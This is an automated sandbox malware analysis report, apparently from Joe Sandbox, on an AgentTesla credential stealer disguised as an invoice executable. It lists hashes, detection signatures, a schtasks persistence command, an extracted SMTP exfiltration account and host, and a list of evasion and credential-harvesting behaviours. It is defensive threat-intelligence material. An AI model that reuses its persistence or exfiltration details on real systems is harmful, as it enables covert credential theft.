Loading ...

Play interactive tourEdit tour

Analysis Report Factura PO 1541973.exe

Overview

General Information

Sample Name:Factura PO 1541973.exe
Analysis ID:433037
MD5:429a3063db13e84f8e0843f46b60753e
SHA1:de9221c73fe3610393f1f9197dfecf0896ed776c
SHA256:62e122a12ea4ccace679e22b13975e1f0e476dda8373279d99b757635c8b06dc
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Factura PO 1541973.exe (PID: 6920 cmdline: 'C:\Users\user\Desktop\Factura PO 1541973.exe' MD5: 429A3063DB13E84F8E0843F46B60753E)
    • schtasks.exe (PID: 7084 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\lVzZfJoExG' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A03.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Factura PO 1541973.exe (PID: 7136 cmdline: C:\Users\user\Desktop\Factura PO 1541973.exe MD5: 429A3063DB13E84F8E0843F46B60753E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "dubai@skycomex.com@EHbqYU1us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.0.Factura PO 1541973.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.0.Factura PO 1541973.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.Factura PO 1541973.exe.404fad0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Factura PO 1541973.exe.404fad0.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    4.2.Factura PO 1541973.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "dubai@skycomex.com@EHbqYU1us2.smtp.mailhostbox.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\lVzZfJoExG.exeMetadefender: Detection: 20%Perma Link
                      Source: C:\Users\user\AppData\Roaming\lVzZfJoExG.exeReversingLabs: Detection: 34%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Factura PO 1541973.exeVirustotal: Detection: 34%Perma Link
                      Source: Factura PO 1541973.exeMetadefender: Detection: 20%Perma Link
                      Source: Factura PO 1541973.exeReversingLabs: Detection: 34%
                      Source: 4.2.Factura PO 1541973.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 4.0.Factura PO 1541973.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: Factura PO 1541973.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Factura PO 1541973.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\pVNuovjPXl\src\obj\Debug\ConstructorInfo.pdbL source: Factura PO 1541973.exe
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\pVNuovjPXl\src\obj\Debug\ConstructorInfo.pdb source: Factura PO 1541973.exe

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49771 -> 208.91.199.223:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49772 -> 208.91.199.223:587
                      Source: global trafficTCP traffic: 192.168.2.4:49771 -> 208.91.199.223:587
                      Source: Joe Sandbox ViewIP Address: 208.91.199.223 208.91.199.223
                      Source: global trafficTCP traffic: 192.168.2.4:49771 -> 208.91.199.223:587
                      Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
                      Source: Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmp, Factura PO 1541973.exe, 00000004.00000003.858298741.0000000000BC4000.00000004.00000001.sdmpString found in binary or memory: http://kCE9JYg5iS.com
                      Source: Factura PO 1541973.exe, 00000000.00000002.655902349.0000000002DA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Factura PO 1541973.exe, 00000004.00000002.912784647.0000000002DF5000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://wJzLSk.com
                      Source: Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: Factura PO 1541973.exe, 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmp, Factura PO 1541973.exe, 00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 4.0.Factura PO 1541973.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE03313AEu002d3B32u002d4C21u002d8888u002d76A497628B03u007d/u00356DE45A1u002d0E78u002d48B9u002dA86Au002d089C7C45AC59.csLarge array initialization: .cctor: array initializer size 11957
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_013BC3A00_2_013BC3A0
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_013BA7580_2_013BA758
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9B6280_2_05D9B628
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9C0480_2_05D9C048
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9822E0_2_05D9822E
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9AD980_2_05D9AD98
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9CFB00_2_05D9CFB0
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D97B000_2_05D97B00
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D975500_2_05D97550
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D975400_2_05D97540
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9F5300_2_05D9F530
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9B6180_2_05D9B618
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9A1900_2_05D9A190
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9A1A00_2_05D9A1A0
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9F0980_2_05D9F098
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9B0500_2_05D9B050
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D900400_2_05D90040
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9B0600_2_05D9B060
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D900070_2_05D90007
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9C0380_2_05D9C038
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9F2D00_2_05D9F2D0
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_05D9AD920_2_05D9AD92
                      Source: Factura PO 1541973.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lVzZfJoExG.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Factura PO 1541973.exe, 00000000.00000002.660645491.000000000BFC0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVBQEHAlZHGNDbNAwDJmWxqJmACCGvaNOCDccRWP.exe4 vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000000.00000002.660113293.0000000005F80000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000000.00000002.661127774.000000000C0B0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000000.00000002.661127774.000000000C0B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000000.00000002.655024928.0000000000A36000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConstructorInfo.exe< vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameVBQEHAlZHGNDbNAwDJmWxqJmACCGvaNOCDccRWP.exe4 vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000004.00000002.911552216.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000004.00000002.911598571.0000000000FF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000004.00000000.654201525.00000000006E6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConstructorInfo.exe< vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000004.00000002.911323137.0000000000D9A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exe, 00000004.00000002.910525371.0000000000AF8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exeBinary or memory string: OriginalFilenameConstructorInfo.exe< vs Factura PO 1541973.exe
                      Source: Factura PO 1541973.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Factura PO 1541973.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: lVzZfJoExG.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 4.0.Factura PO 1541973.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.0.Factura PO 1541973.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/5@1/1
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile created: C:\Users\user\AppData\Roaming\lVzZfJoExG.exeJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeMutant created: \Sessions\1\BaseNamedObjects\vWppkWwsbmKGuLII
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2A03.tmpJump to behavior
                      Source: Factura PO 1541973.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                      Source: Factura PO 1541973.exeVirustotal: Detection: 34%
                      Source: Factura PO 1541973.exeMetadefender: Detection: 20%
                      Source: Factura PO 1541973.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile read: C:\Users\user\Desktop\Factura PO 1541973.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Factura PO 1541973.exe 'C:\Users\user\Desktop\Factura PO 1541973.exe'
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\lVzZfJoExG' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A03.tmp'
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess created: C:\Users\user\Desktop\Factura PO 1541973.exe C:\Users\user\Desktop\Factura PO 1541973.exe
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\lVzZfJoExG' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A03.tmp'Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess created: C:\Users\user\Desktop\Factura PO 1541973.exe C:\Users\user\Desktop\Factura PO 1541973.exeJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Factura PO 1541973.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Factura PO 1541973.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Factura PO 1541973.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\pVNuovjPXl\src\obj\Debug\ConstructorInfo.pdbL source: Factura PO 1541973.exe
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\pVNuovjPXl\src\obj\Debug\ConstructorInfo.pdb source: Factura PO 1541973.exe
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_013B043B pushad ; ret 0_2_013B0442
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeCode function: 0_2_013B0438 pushad ; ret 0_2_013B043A
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.96018720186
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.96018720186
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile created: C:\Users\user\AppData\Roaming\lVzZfJoExG.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\lVzZfJoExG' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A03.tmp'
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
